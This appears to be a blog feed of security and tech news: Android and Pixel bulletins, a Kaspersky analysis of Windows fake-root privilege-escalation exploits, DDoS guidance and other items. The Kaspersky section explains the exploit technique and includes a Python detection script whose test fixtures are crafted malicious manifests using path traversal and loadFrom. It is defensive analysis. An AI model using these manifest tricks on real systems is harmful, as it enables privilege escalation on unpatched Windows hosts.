Google Issues Security Warning for Pixel Devices: Two High-Severity Vulnerabilities Under Limited, Targeted Exploitation
    Google has issued a security advisory to Pixel users, alerting them to two high-severity vulnerabilities that may be under limited, targeted exploitation. These vulnerabilities, identified as CVE-2024-29745 and CVE-2024-29748, pose significant risks and require immediate attention.
    The first vulnerability, CVE-2024-29745, is classified as an information disclosure vulnerability in the bootloader component. Bootloaders play a crucial role in the boot process of devices, ensuring that essential operating system data is loaded into memory during startup. Exploitation of this vulnerability could lead to unauthorized access to sensitive information stored on the device.
    The second vulnerability, CVE-2024-29748, is an elevation of privilege (EoP) vulnerability found in the Pixel firmware. Firmware serves as device-specific software that provides fundamental machine instructions necessary for hardware functionality and interaction with other software components. If exploited, this vulnerability could allow attackers to escalate their privileges on the device, potentially gaining control over critical system functions.
    To address these security risks, Google has released a security patch with a designated level of 2024-04-05 for Pixel devices. It is imperative for Pixel users to apply this security patch promptly to protect their devices from potential exploitation and mitigate the associated risks.
    Google emphasizes the importance of keeping devices up to date with the latest security patches and software updates to ensure optimal security posture and protect against emerging threats. Users are encouraged to enable automatic updates and regularly check for security patches to stay protected from vulnerabilities and cyber threats.
    In conclusion, the detection and prompt mitigation of these high severity vulnerabilities underscore Google's commitment to prioritizing user security and addressing potential security risks proactively. Pixel users are urged to take immediate action by applying the latest security patch to safeguard their devices and mitigate the risks associated with these vulnerabilities.
    ------------------
    Android Security Bulletin—April 2024
    Published April 1, 2024
    The Android Security Bulletin contains details of security vulnerabilities affecting Android devices. Security patch levels of 2024-04-05 or later address all of these issues. To learn how to check a device's security patch level, see Check and update your Android version.
    Android partners are notified of all issues at least a month before publication. Source code patches for these issues will be released to the Android Open Source Project (AOSP) repository in the next 48 hours. We will revise this bulletin with the AOSP links when they are available.
    The most severe of these issues is a high security vulnerability in the System component that could lead to local escalation of privilege with no additional execution privileges needed. The severity assessment is based on the effect that exploiting the vulnerability would possibly have on an affected device, assuming the platform and service mitigations are turned off for development purposes or if successfully bypassed.
    Refer to the Android and Google Play Protect mitigations section for details on the Android security platform protections and Google Play Protect, which improve the security of the Android platform.
    Android and Google service mitigations
    This is a summary of the mitigations provided by the Android security platform and service protections such as Google Play Protect. These capabilities reduce the likelihood that security vulnerabilities could be successfully exploited on Android.
    Exploitation for many issues on Android is made more difficult by enhancements in newer versions of the Android platform. We encourage all users to update to the latest version of Android where possible. The Android security team actively monitors for abuse through Google Play Protect and warns users about Potentially Harmful Applications. Google Play Protect is enabled by default on devices with Google Mobile Services, and is especially important for users who install apps from outside of Google Play.
    2024-04-01 security patch level vulnerability details
    In the sections below, we provide details for each of the security vulnerabilities that apply to the 2024-04-01 patch level. Vulnerabilities are grouped under the component they affect. Issues are described in the tables below and include CVE ID, associated references, type of vulnerability, severity, and updated AOSP versions (where applicable). When available, we link the public change that addressed the issue to the bug ID, like the AOSP change list. When multiple changes relate to a single bug, additional references are linked to numbers following the bug ID. Devices with Android 10 and later may receive security updates as well as Google Play system updates.
    Framework
    The most severe vulnerability in this section could lead to local escalation of privilege with no additional execution privileges needed.
    | CVE | References | Type | Severity | Updated AOSP versions |
    | CVE-2024-23710 | A-311374917 | EoP | High | 13, 14 |
    | CVE-2024-23713 | A-305926929 | EoP | High | 12, 12L, 13, 14 |
    | CVE-2024-0022 | A-298635078 | ID | High | 13, 14 |
    | CVE-2024-23712 | A-304983146 | DoS | High | 12, 12L, 13, 14 |
    System
    The most severe vulnerability in this section could lead to local escalation of privilege with no additional execution privileges needed.
    | CVE | References | Type | Severity | Updated AOSP versions |
    | CVE-2024-23704 | A-299931761 | EoP | High | 13, 14 |
    | CVE-2023-21267 | A-218495634 [2] [3] | ID | High | 12, 12L, 13, 14 |
    | CVE-2024-0026 | A-308414141 | DoS | High | 12, 12L, 13, 14 |
    | CVE-2024-0027 | A-307948424 | DoS | High | 12, 12L, 13, 14 |
    Google Play system updates
    There are no security issues addressed in Google Play system updates (Project Mainline) this month.
    2024-04-05 security patch level vulnerability details
    In the sections below, we provide details for each of the security vulnerabilities that apply to the 2024-04-05 patch level. Vulnerabilities are grouped under the component they affect. Issues are described in the tables below and include CVE ID, associated references, type of vulnerability, severity, and updated AOSP versions (where applicable). When available, we link the public change that addressed the issue to the bug ID, like the AOSP change list. When multiple changes relate to a single bug, additional references are linked to numbers following the bug ID.
    MediaTek components
    These vulnerabilities affect MediaTek components and further details are available directly from MediaTek. The severity assessment of these issues is provided directly by MediaTek.
    | CVE | References | Severity | Subcomponent |
    | CVE-2024-20039 | A-323462011, M-MOLY01240012 * | High | Modem Protocol |
    | CVE-2024-20040 | A-323465955, M-ALPS08360153 * | High | wlan firmware |
    | CVE-2023-32890 | A-323469023, M-MOLY01183647 * | High | Modem EMM |
    Widevine
    This vulnerability affects Widevine components and further details are available directly from Widevine. The severity assessment of this issue is provided directly by Widevine.
    | CVE | References | Severity | Subcomponent |
    | CVE-2024-0042 | A-312543200 * | High | Widevine DRM |
    Qualcomm components
    These vulnerabilities affect Qualcomm components and are described in further detail in the appropriate Qualcomm security bulletin or security alert. The severity assessment of these issues is provided directly by Qualcomm.
    | CVE | References | Severity | Subcomponent |
    | CVE-2024-21468 | A-318393412, QC-CR#3614610 [2] | High | Kernel |
    | CVE-2024-21472 | A-318393741, QC-CR#3626401 | High | Kernel |
    Qualcomm closed-source components
    These vulnerabilities affect Qualcomm closed-source components and are described in further detail in the appropriate Qualcomm security bulletin or security alert. The severity assessment of these issues is provided directly by Qualcomm.
    | CVE | References | Severity | Subcomponent |
    | CVE-2023-28582 | A-299147008 * | Critical | Closed-source component |
    | CVE-2023-28547 | A-303101227 * | High | Closed-source component |
    | CVE-2023-33023 | A-303101376 * | High | Closed-source component |
    | CVE-2023-33084 | A-299146258 * | High | Closed-source component |
    | CVE-2023-33086 | A-299146962 * | High | Closed-source component |
    | CVE-2023-33095 | A-299146595 * | High | Closed-source component |
    | CVE-2023-33096 | A-299146025 * | High | Closed-source component |
    | CVE-2023-33099 | A-303101372 * | High | Closed-source component |
    | CVE-2023-33100 | A-303101224 * | High | Closed-source component |
    | CVE-2023-33101 | A-303101066 * | High | Closed-source component |
    | CVE-2023-33103 | A-299146257 * | High | Closed-source component |
    | CVE-2023-33104 | A-299146882 * | High | Closed-source component |
    | CVE-2023-33115 | A-303101567 * | High | Closed-source component |
    | CVE-2024-21463 | A-318393254 * | High | Closed-source component |
    Common questions and answers
    This section answers common questions that may occur after reading this bulletin.
    1. How do I determine if my device is updated to address these issues?
    To learn how to check a device's security patch level, see Check and update your Android version.
    Security patch levels of 2024-04-01 or later address all issues associated with the 2024-04-01 security patch level. Security patch levels of 2024-04-05 or later address all issues associated with the 2024-04-05 security patch level and all previous patch levels. Device manufacturers that include these updates should set the patch string level to:
    [ro.build.version.security_patch]:[2024-04-01]
    [ro.build.version.security_patch]:[2024-04-05]
    For some devices on Android 10 or later, the Google Play system update will have a date string that matches the 2024-04-01 security patch level. Please see this article for more details on how to install security updates.
    2. Why does this bulletin have two security patch levels?
    This bulletin has two security patch levels so that Android partners have the flexibility to fix a subset of vulnerabilities that are similar across all Android devices more quickly. Android partners are encouraged to fix all issues in this bulletin and use the latest security patch level.
    Devices that use the 2024-04-01 security patch level must include all issues associated with that security patch level, as well as fixes for all issues reported in previous security bulletins. Devices that use the security patch level of 2024-04-05 or newer must include all applicable patches in this (and previous) security bulletins. Partners are encouraged to bundle the fixes for all issues they are addressing in a single update.
    3. What do the entries in the Type column mean?
    Entries in the Type column of the vulnerability details table reference the classification of the security vulnerability.
    | Abbreviation | Definition |
    | RCE | Remote code execution |
    | EoP | Elevation of privilege |
    | ID | Information disclosure |
    | DoS | Denial of service |
    | N/A | Classification not available |
    4. What do the entries in the References column mean?
    Entries under the References column of the vulnerability details table may contain a prefix identifying the organization to which the reference value belongs.
    | Prefix | Reference |
    | A- | Android bug ID |
    | QC- | Qualcomm reference number |
    | M- | MediaTek reference number |
    | N- | NVIDIA reference number |
    | B- | Broadcom reference number |
    | U- | UNISOC reference number |
    5. What does an * next to the Android bug ID in the References column mean?
    Issues that are not publicly available have an * next to the corresponding reference ID. The update for that issue is generally contained in the latest binary drivers for Pixel devices available from the Google Developer site.
    6. Why are security vulnerabilities split between this bulletin and device/partner security bulletins, such as the Pixel bulletin?
    Security vulnerabilities that are documented in this security bulletin are required to declare the latest security patch level on Android devices. Additional security vulnerabilities that are documented in the device/partner security bulletins are not required for declaring a security patch level. Android device and chipset manufacturers may also publish security vulnerability details specific to their products, such as Google, Huawei, LGE, Motorola, Nokia, or Samsung.

    SeedTheNet
    WhatsApp, the popular messaging platform used by billions worldwide, experienced a major outage today at 9:00 pm, causing users to be unable to send or receive messages. The outage affected users across various regions.
     

    Image source : https://downdetector.com/status/whatsapp/
    Service seems to be back to normal.

    SeedTheNet
    Sega's recent announcement of extensive layoffs has sent shockwaves through the gaming industry, impacting key studios such as Sega Europe, Creative Assembly, and Hardlight. The news came in an email from Sega Europe boss Jurgen Post, detailing the layoffs affecting approximately 240 roles across these studios. Notably, the email also mentioned the sale of Relic Entertainment, responsible for iconic titles like Company of Heroes and Dawn of War.
    While specific numbers for each studio were not disclosed, Sega did confirm that Sports Interactive and Two Point Studios, also under the Sega Europe umbrella, were not affected. Despite the layoffs, Creative Assembly's upcoming projects, including new entries in the Total War series and an unannounced project, are still in active development.
    The sale of Relic Entertainment marks a significant transition as the studio moves towards becoming independently operated. Sega expressed its support for this shift, indicating a positive outlook for Relic's future endeavors. Relic itself affirmed its newfound independence, mentioning an external investor aiding in this transition. Notably, work on Company of Heroes 3 and ongoing support for their existing games will continue unabated.
    This announcement underscores the volatile nature of the gaming industry, where companies must navigate evolving market dynamics while striving to maintain creativity and innovation. As Sega and its associated studios navigate these changes, the gaming community eagerly anticipates the future projects and developments that will emerge from this transformative period.
    Relic posted this alongside the news announcement:

    I think after Relic failed with Company of Heroes 3 and ruined the series with this failure, SEGA might have lost more than it invested and realized it is not worth keeping Relic with their failing game CoH3.
    From a gaming giant in the old school gaming market, to a company that is laying off staff and developers.

    SeedTheNet
    Google Settles Lawsuit, Agrees to Delete Billions of Data Records from Chrome's Incognito Mode
    In a significant development regarding online privacy, Google has reached a settlement in a class-action lawsuit that accused the tech giant of collecting data from users' Chrome browsers while in Incognito mode without proper disclosure. This settlement marks a crucial step in addressing concerns about user privacy and data collection practices in one of the most widely used web browsers globally.
    The lawsuit, filed in June 2020, alleged that Google collected billions of data records from 136 million Chrome users in the United States while they were browsing in Incognito mode. This mode is designed to offer users a private browsing experience by not storing their browsing history or cookies. However, the lawsuit argued that Google's practices violated users' privacy expectations and failed to provide adequate transparency about data collection activities.
    As part of the settlement, Google has agreed to delete the data records collected from Chrome users in Incognito mode. This move is significant as it demonstrates Google's acknowledgment of the concerns raised by users and regulatory bodies regarding data privacy. By taking this action, Google aims to address the allegations of undisclosed data collection and improve transparency in its browser's privacy features.
    The case highlights broader issues surrounding online privacy and the challenges users face in maintaining control over their personal data while using digital services. Incognito mode, although intended to offer a level of privacy, has faced scrutiny for not providing complete anonymity or protection against tracking by websites and third-party entities.
    In response to the settlement, Google has reaffirmed its commitment to user privacy and stated that it will continue to enhance privacy features in Chrome to provide users with more control over their data. This includes improving transparency about data collection practices, implementing stricter privacy controls, and empowering users to make informed decisions about their online privacy settings.
    The resolution of this lawsuit serves as a reminder of the importance of transparency, accountability, and user empowerment in the digital age. It highlights the ongoing efforts by both technology companies and regulators to address privacy concerns and create a more privacy-conscious digital ecosystem that respects users' rights to data protection and control.

    SeedTheNet
    14 Mar 2024
    Authors: Elsayed Elrefaei, Ashraf Refaat (Kaspersky GERT)
    On August 8, 2023, Microsoft finally released a kernel patch for a class of vulnerabilities affecting Microsoft Windows since 2015. The vulnerabilities lead to elevation of privilege (EoP), which allows an account with user rights to gain SYSTEM privileges on a vulnerable host. The root cause of this attack surface, according to a 2015 blog, is the ability of a normal user account to replace the original C:\ drive with a fake one by placing a symlink for the system drives in the device map for each login session. This fake drive will be followed by the kernel during impersonation instead of the original system drive. More than five months after the patches for these vulnerabilities were released, we’re still seeing some of their exploits in the wild because it’s a very easy way to get a quick NT AUTHORITY\SYSTEM and that’s why it may be favored by well-known threat actors.
    We discussed these findings at the BlackHat MEA conference in November 2023, and in December 2023 and January 2024, we found two exploits that could still use this attack surface in the unpatched version of Windows. Both exploits are packed in UPX. After analyzing the first one, we saw that it was a packed version of a Google Project Zero PoC sample. The other sample was a packed version of an SSD Secure Disclosure public PoC, even using the same NamedPipe “\\\\.\\Pipe\\TyphoonPWN” without modifications. The PDB paths for both samples are:
    C:\Users\Administrator\source\repos\exp\x64\Release\exp.pdb
    C:\VVS-Rro\CVEs\spool\BitsPoc\src\x64\Release\PoC_BITs.pdb
    Below we will highlight the key points and then focus on how to check if any of the vulnerabilities have been exploited or if there have been any attempts to exploit them, and enumerate popular CVEs included in this vulnerable surface.
    Affected processes and services include native Windows services that run by default on most versions of the operating system. These include:
    • CSRSS
    • Windows Error Reporting (WER)
    • File History Service
    • Background Intelligent Transfer Service (BITS)
    • Print Spooler
    [Figure: Vulnerable Windows processes and services]
    The exploits affecting this attack surface share a common logic or pattern, including:
    • Searching for a DLL that runs with system integrity.
    • The DLL has an isolation-aware manifest file.
    • The ability to change the C:\ root to a writable directory via symlinks.
    CSRSS | CVE-2022-22047
    This Activation Context Cache Poisoning vulnerability leads to local privilege escalation. It’s one of the CVEs that was actively exploited by a threat actor called KNOTWEED | Denim Tsunami.
    Reversing the in-the-wild exploit for the CVE-2022-22047 shows:
    The exploit crafts a call into CSRSS. The call requests an activation context for a privileged executable and specifies a malicious manifest.
    The manifest uses an undocumented manifest XML attribute named loadFrom. This attribute allows unrestricted redirection of DLLs to any location on a disk, including locations outside of the normal search path, without even having to change the C:\ root drive.
    Here is a detailed blog post by ZDI explaining CSRSS Cache Poisoning.
    CSRSS | CVE-2022-37989
    The second CSRSS cache poisoning vulnerability was a bypass of the patch for the first one, CVE-2022-22047. After the undocumented “LoadFrom” attribute was patched, another attribute could be abused to load a manifest file from a user-controlled path: declaring a dependent assembly with path traversal in its name attribute.

    The patch for the CVE-2022-37989 was simple: check if the name attribute of the dependency contains any forward or backward slashes, and set a flag to stop caching this suspicious manifest if name path traversal is detected. This CVE was discovered by ZDI.
    Print Spooler | CVE-2022-29104
    Print Spooler is a service that runs by default in almost all versions of Windows. It’s responsible for managing paper print jobs sent from a computer to a printer or print server. Reversing in-the-wild exploits of the CVE-2022-29104 Print Spooler vulnerability shows that it’s a .NET sample that creates a symbolic link from C:\ to the fake root C:\Imprint. The sample was uploaded to VirusTotal.

    Fake C:\ drive structure:
    C:\Imprint\Windows\system32
    C:\Imprint\Windows\WinSxS
    All folders inside the Imprint folder are writable, allowing an attacker to control their contents.
    Path traversal is added to “AssemblyIdentity” to point to the Imprint writable path.

    The vulnerability analysis shows that:
    • An attacker can remap the root drive (C:\) for privileged processes during impersonation.
    • During impersonation, all file accesses are performed using the DOS device map of the impersonated process.
    • CSRSS uses a user-modified side-by-side manifest for generating the activation context instead of the manifest in the WinSxS folder C:\Windows\WinSxS.
    The WinSxS folder stores multiple copies of system files and components. It provides a central location for storing different versions of system files that are shared by multiple applications and processes, and it provides system stability and compatibility by allowing different applications to use the specific versions of files they need. WinSxS avoids DLL hell, a problem that occurs when different applications require different versions of the same DLL. The Windows operating system uses the application manifest to determine which version is appropriate for which app.
    The application manifest is stored in XML format and describes:
    • The dependencies associated with the application.
    • What permissions the application requires.
    • What compatibility settings the application supports.
    CSRSS mitigation was enabled for spoolsv.exe and printfilterpipelinesvc.exe to stop impersonation while loading external resources, and then to resume impersonation after the external resources are loaded.
    Print Spooler | CVE-2022-41073
    After CVE-2022-29104 was patched, another vulnerability affecting Print Spooler was discovered – CVE-2022-41073. Reversing the in-the-wild exploit of this vulnerability shows some XML manipulation using path traversal to a writable path containing a modified version of prntvpt.dll that is loaded by Print Spooler.

    According to Project Zero, mitigation was added to CSRSS: the patch simply stopped any impersonation prior to the LoadLibraryExW call in winspool!LoadNewCopy, and then resumed it.
    After that the LoadLibraryExW call returned:
    + if (RevertToProcess(&TokenHandle, x) >= 0) {
        lib = LoadLibraryExW(arg1, 0, dwFlags);
    +   ResumeImpersonation(TokenHandle);
    + }
    NtOpenFile is called with the OBJ_IGNORE_IMPERSONATED_DEVICEMAP flag. It will stop impersonation when loading any external resources while using the LoadNewCopy API. Stopping impersonation means that privileged processes will not use the fake root implemented with the medium integrity process, and instead it will use the original C:\ drive root to avoid loading untrusted or malicious resources.
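    Review bot: in this hunk the LoadLibraryExW call is now inside the new if, so on the path where RevertToProcess fails lib is never assigned and nothing in the visible lines handles that case. Skipping the load when impersonation cannot be dropped is the safe choice, since falling back to loading under the impersonated device map would reintroduce the fake-root problem, but the hunk should make that explicit with an else branch that returns an error (or leaves lib set to NULL) so the caller in LoadNewCopy does not consume an unset value.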
    Windows Error Reporting | CVE-2023-36874
    Windows Error Reporting (WER) is a privileged service that analyzes and reports various software issues in Windows. The root cause of CVE-2023-36874 is the CreateProcess API call made when a crash happens: CreateProcess can be tricked into following the fake root and creating the process from this writable fake root in the context of the privileged WER service, leading to privilege escalation.
    CVE-2023-36874 was exploited in the wild and has several published PoCs. The exploit interacts with the IWerReport COM interface and calls SubmitReport; UtilLaunchWerManager is then called, which calls CreateProcess. The CreateProcess API is thus exposed to DOS device map modification.

    Once the exploit to submit a fake crash report is executed, it will end up calling the vulnerable CreateProcess API.
    File History Service | CVE-2023-35359
    File History Service can be used to automatically back up personal folders and files such as documents, pictures and videos. Reversing the in-the-wild exploit shows that when File History Service starts, it impersonates the current user and then loads a DLL called fhcfg.dll under impersonation. This DLL has an “application aware manifest config” that attempts to load another resource called msasn1.dll. The exploit starts with the usual technique of changing the C:\ root to a fake writable root.

    Windows Error Reporting – 2nd exploit | CVE-2023-35359
    The first Windows Error Reporting vulnerability used the CreateProcess API inside the privileged WER service, which follows the fake root when creating a process. After that was patched, the WER service started using CreateProcessAsUser instead of the CreateProcess API. However, adversaries then found another way that could lead to CreateProcess being used again under certain conditions, which was treated as a new vulnerability. For example, if the WER service is marked as disabled on a system, a privileged process on that system is impersonating a medium-integrity user, and an unhandled exception during impersonation results in a crash, that crash tries to enable the WER service for reporting. The detailed analysis of this CVE shows that it does not appear to be exploitable.
    [Figure: The exploitation of CVE-2023-35359]
    BITS | CVE-2023-35359
    The Background Intelligence Transfer Service (BITS) is responsible for facilitating the asynchronous and prioritized transfer of files between a client and a server. BITS operates in the background, which means it can perform file transfers without interrupting a user or consuming all of the available network.
    You may notice that the number CVE-2023-35359 has not changed for the last three CVEs because Microsoft decided in the last patch to assign the same CVE to all vulnerabilities of this type. So there are different vulnerabilities in different processes/services but with the same CVE number.
    Timeline for the bypassing/patching process from 2015 to August 2023
    How was the patch for this attack surface applied?
    The patch was applied to ObpLookupObjectName to check if the loaded resource is a file object and the call to ObpUseSystemDeviceMap succeeds. It then ignores the impersonation and uses SystemDevice.

    ObpLookupObjectName checks FileObjectType followed by a call to ObpUseSystemDeviceMap.

    The ObpUseSystemDeviceMap function checks for the SystemDevice to be used instead of the impersonated device.
    How to check if a vulnerability was exploited or any attempts were made to exploit it?
    When analyzing most of the exploits targeting this attack surface, we observed common behaviors that could be used as indicators of whether there were any exploitation attempts:
    • Most of the in-the-wild exploits create a writable folder inside the C:\ drive, and the structure of this folder mimics the structure of the original C:\ drive, for example:
      C:\Windows\System32 → C:\FakeFolder\Windows\System32
      C:\Windows\WinSxS → C:\FakeFolder\Windows\WinSxS
      So finding a writable folder that mimics the C:\ drive folder structure may be an indicator of an exploitation attempt.
    • Copying the manifest files from the original WinSxS folder in C:\Windows\WinSxS to a writable directory and modifying them could be a good indicator of an exploitation attempt.
    • Manifest files that contain undocumented XML attributes such as “LoadFrom”, or manifest files that contain path traversal in the “name” attribute, could be a valid sign of an exploitation attempt.
    • Creating a symbolic link from the original system drive to a writable directory, especially from processes with medium integrity using the \RPC Control\ object directory.
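    The first three indicators above can be checked mechanically. The following Python triage helpers are an added example, not the Kaspersky article's tooling: find_fake_roots() reports directories that mirror the C:\ layout, and analyze_manifest_text() flags a loadFrom attribute or a path separator in an assemblyIdentity name (the same test the CVE-2022-37989 patch applies). The FakeFolder and Imprint names, the sample manifests and the temp-dir fixture are constructed; the writable-ACL check is omitted, so a hit means layout mimicry, not a confirmed writable fake root.

```python
# Added example (not the article's tooling): triage helpers for two of the
# indicators listed above. The sample manifests and the FakeFolder/Imprint
# names in build_demo_tree() are constructed; the writable-ACL check is left
# out, so a hit means "mirrors the C:\ layout", not "confirmed writable".
import os
import tempfile
import xml.etree.ElementTree as ET
from dataclasses import dataclass, field
from typing import List

# Subtrees the in-the-wild exploits recreate under their writable fake root.
MIRRORED_SUBPATHS = (os.path.join("Windows", "System32"),
                     os.path.join("Windows", "WinSxS"))


@dataclass
class ManifestFinding:
    path: str
    reasons: List[str] = field(default_factory=list)


def _localname(name: str) -> str:
    """'{urn:...}assemblyIdentity' -> 'assemblyIdentity'."""
    return name.rsplit("}", 1)[-1]


def analyze_manifest_text(xml_text: str, path: str = "<inline>") -> ManifestFinding:
    """Flag the undocumented loadFrom attribute (CVE-2022-22047) and a path
    separator in an assemblyIdentity name (the check the CVE-2022-37989 patch makes)."""
    finding = ManifestFinding(path)
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError as exc:
        finding.reasons.append(f"unparseable manifest: {exc}")
        return finding
    for elem in root.iter():
        tag = _localname(elem.tag)
        for attr, value in elem.attrib.items():
            attr = _localname(attr)
            if attr.lower() == "loadfrom":
                finding.reasons.append(f"<{tag}> carries undocumented loadFrom={value!r}")
            if tag == "assemblyIdentity" and attr == "name" and ("/" in value or "\\" in value):
                finding.reasons.append(f"assemblyIdentity name contains a path separator: {value!r}")
    return finding


def scan_manifests(scan_root: str) -> List[ManifestFinding]:
    """Findings for every *.manifest file under scan_root that triggers a rule."""
    findings = []
    for dirpath, _, filenames in os.walk(scan_root):
        for name in filenames:
            if name.lower().endswith(".manifest"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    finding = analyze_manifest_text(fh.read(), path)
                if finding.reasons:
                    findings.append(finding)
    return findings


def find_fake_roots(scan_root: str) -> List[str]:
    """Directories below scan_root (as relative paths) that hold a Windows\\System32
    or Windows\\WinSxS subtree. scan_root itself is skipped so the real system
    drive is never reported when scanning C:\\."""
    hits = []
    for dirpath, dirnames, _ in os.walk(scan_root):
        rel = os.path.relpath(dirpath, scan_root)
        if rel == os.curdir:
            continue
        if any(os.path.isdir(os.path.join(dirpath, sub)) for sub in MIRRORED_SUBPATHS):
            hits.append(rel)
            dirnames[:] = []  # the mirrored Windows tree below it is already reported
    return sorted(hits)


# Constructed sample manifests (namespace as in real side-by-side manifests).
_HEAD = '<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">'
BENIGN_MANIFEST = (_HEAD + '<dependency><dependentAssembly><assemblyIdentity type="win32" '
                   'name="Microsoft.Windows.Common-Controls" version="6.0.0.0"/>'
                   '</dependentAssembly></dependency></assembly>')
TRAVERSAL_MANIFEST = (_HEAD + '<dependency><dependentAssembly><assemblyIdentity type="win32" '
                      'name="..\\..\\Imprint\\Windows\\WinSxS\\x" version="6.0.0.0"/>'
                      '</dependentAssembly></dependency></assembly>')
LOADFROM_MANIFEST = _HEAD + '<file name="example.dll" loadFrom="C:\\FakeFolder\\example.dll"/></assembly>'


def build_demo_tree() -> str:
    """Constructed tree in a temp dir: one fake root mirroring C:\\ that holds a
    poisoned manifest, plus an ordinary folder holding a benign manifest."""
    base = tempfile.mkdtemp(prefix="fakeroot-demo-")
    for sub in MIRRORED_SUBPATHS:
        os.makedirs(os.path.join(base, "FakeFolder", sub))
    os.makedirs(os.path.join(base, "Users", "Public"))
    with open(os.path.join(base, "FakeFolder", "Windows", "WinSxS", "x.manifest"), "w") as fh:
        fh.write(TRAVERSAL_MANIFEST)
    with open(os.path.join(base, "Users", "Public", "ok.manifest"), "w") as fh:
        fh.write(BENIGN_MANIFEST)
    return base
```

On a real host you would point find_fake_roots() and scan_manifests() at the system drive and then confirm the ACLs of any hit by hand, since the script only tests layout.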

    SeedTheNet
    The United States government updated its Distributed Denial of Service (DDoS) guidelines in March 2024.
    The updated guidelines, released by the Cybersecurity and Infrastructure Security Agency (CISA), provide comprehensive recommendations and best practices to mitigate the impact of DDoS attacks. These guidelines are designed to help organizations across various sectors, including government agencies, private enterprises, and critical infrastructure operators, better defend against and respond to DDoS incidents.
     
    DoS and DDoS
    A DoS and a DDoS attack are similar in that they both aim to disrupt the availability of a target system or network. However, there are key differences between the two.
    1. DoS Attack: A DoS attack involves a single source used to overwhelm the target system with a flood of traffic or resource-consuming requests. The malicious actor typically uses one computer or a small number of computers to generate the attack. The goal of a DoS attack is to render the target system unavailable to its intended users and deny them access to resources or services.
    2. DDoS Attack: A DDoS attack involves multiple sources. Often, a multitude of compromised computers—known as botnets—are coordinated to launch the attack. Each machine in the botnet sends a flood of traffic or requests to the target system simultaneously to amplify the follow-on impact. Due to the distributed nature of a DDoS attack, defending targeted networks has increased difficulty compared to a DoS attack. The main advantage of a DDoS attack over a DoS attack is the ability to generate a significantly higher volume of traffic, overwhelming the target system’s resources to a greater extent. DDoS attacks can also employ various techniques, such as IP spoofing, which involves a malicious actor manipulating the source IP address and botnets to disguise the origin of the attack and make it more difficult to trace it back to them. In terms of impact, both DoS and DDoS attacks can disrupt the availability of a targeted system or network, leading to service outages, financial losses, and reputational damage.

    DoS and DDoS Attacks Categorized Into Three Technique Types
    1. Volume-Based Attacks: These attacks aim to consume the available bandwidth or system resources of the target by overwhelming it with a massive volume of traffic. The goal is to saturate the network or exhaust the target’s resources, rendering it unable to handle legitimate requests.

    Source: taken from the PDF file; the rest can be found in the PDF linked at the bottom of the post.
    The updated guidelines underscore the evolving nature of cyber threats and the need for proactive measures to safeguard digital assets and critical infrastructure. By adopting these guidelines and investing in cybersecurity measures, organizations can strengthen their resilience against DDoS attacks and contribute to a more secure cyber landscape.
     
    The guideline can be found here: https://www.cisa.gov/sites/default/files/2024-03/Understanding and Responding to Distributed Denial-of-Service Attacks_508c.pdf

    SeedTheNet
    WARNING: Global themes and widgets created by 3rd party developers for Plasma can and will run arbitrary code. You are encouraged to exercise extreme caution when using these products.
    A user has had a bad experience installing a global theme on Plasma and lost personal data.
    https://www.reddit.com/r/kde/comments/1bixmbx/do_not_install_global_themes_some_wipe_out_all/

    Global themes change the look of Plasma, but also the behavior. To do this they run code, and this code can be faulty, as in the case mentioned above. The same goes for widgets and plasmoids.
    For now, as a caution, it is better not to download any custom themes for KDE Plasma on Linux.
    https://floss.social/@kde/112128243960545659
     

    SeedTheNet
    Due to cheats being used in the finals, the tournament was postponed, and a Twitter post by Apex Legends Esports states the following:

    Easy Anti-Cheat, meanwhile, stated this afterward:

    According to the PCGamesN website:
    Midway through their match on Storm Point, TSM’s Phillip ‘ImperialHal’ Dosen and DarkZero’s Noyan ‘Genburten’ Ozkose were both hit by what appears to be an RCE hack, meaning that the bad actor could, in theory, manipulate elements of their games.
    As a result, both players had their cheats toggled on instead of off, hence Hal’s “I’ve got an aimbot.” Additionally, as the hack went through, a bizarre message seems to have popped up on Genburten’s screen, showing that cheats were, in fact, switched on mid-match.
    As a result, Respawn terminated the match, officially stating that “due to the competitive integrity of this series being compromised, we have made the decision to postpone the NA finals at this time. We will share more information soon.”

    ---
    It is quite weird and funny how, even in tournaments, gamers will still try to cheat while the anti-cheat software or the people who monitor are almost useless.
    Paying a license fee, as a developer, for anti-cheat software that won't be able to protect your game even in a country-wide tournament is quite an astonishing disappointment.
    EAC clarifying that its software is not vulnerable, but not clarifying anything about the cheat going undetected, is even funnier.

    Gamers were hacking their way to the 2 million.

    SeedTheNet
    Resolved issues (FortiOS 7.0.14)

    Application Control
    Bug ID    Description
    820481    For firewall policies using inspection-mode proxy, some HTTP/2 sessions may be invalidly detected as unknown application.

    DNS Filter
    Bug ID    Description
    907365    DNS proxy caches DNS responses with only one CNAME record.

    Endpoint Control
    Bug ID    Description
    979811    The ZTNA channel is not cleaned when overwriting old lls entries.

    Explicit Proxy
    Bug ID    Description
    901627    Explicit proxy and SD-WAN fail to match a policy if the destination has multiple zones set.
    942612    Web proxy forward server does not convert HTTP version to the original version when sending them back to the client.
    978473    Explicit proxy policy function issues when matching external-threat feed categories.

    Firewall
    Bug ID    Description
    898938    NAT64 does not recover when the interface changes.
    953907    Virtual wire pair interface drops all packets if the prp-port-in/prp-port-out setting is configured under system npu-setting prp on FG-101F.
    977641    In transparent mode, multicast packets are not forwarded through the bridge and are dropped.

    GUI
    Bug ID    Description
    848660    Read-only administrator may encounter a Maximum number of monitored interfaces reached error when viewing an interface bandwidth widget for an interface that does not have the monitor bandwidth feature enabled.
    867802    GUI always displays Access denied error after logging in.
    874502    A prompt to Login as ReadOnly/ReadWrite is not displayed when post-login-banner is enabled on a FortiGate managed by FortiManager.
    969101    Managed FortiAPs page is not loading for non super-admin users.

    HA
    Bug ID    Description
    871636    HA configuration synchronization packets (Ethertype 0x8893) are dropped when going through VXLAN.
    904117    When walking through the session list to change the ha_id, some dead sessions could be freed one more time.
    924671    There is no response on ha-mgmt-interfaces after a reboot when using a VLAN interface based on hd-sw as the ha-mgmt interface.
    937246    An error condition occurred while forwarding over a VRRP address, caused by the creation of a new VLAN.
    949352    The user.radius checksum is the same in both HA units, but the GUI shows a different checksum on the secondary and the HA status is out of sync.
    962681    In a three member A-P cluster, the dhcp lease list (execute dhcp lease-list) might be empty on secondary units.

    Hyperscale
    Bug ID    Description
    839958    service-negate does not work as expected in a hyperscale deny policy.
    940511    In some cases, carrier-grade NAT is dropping traffic.
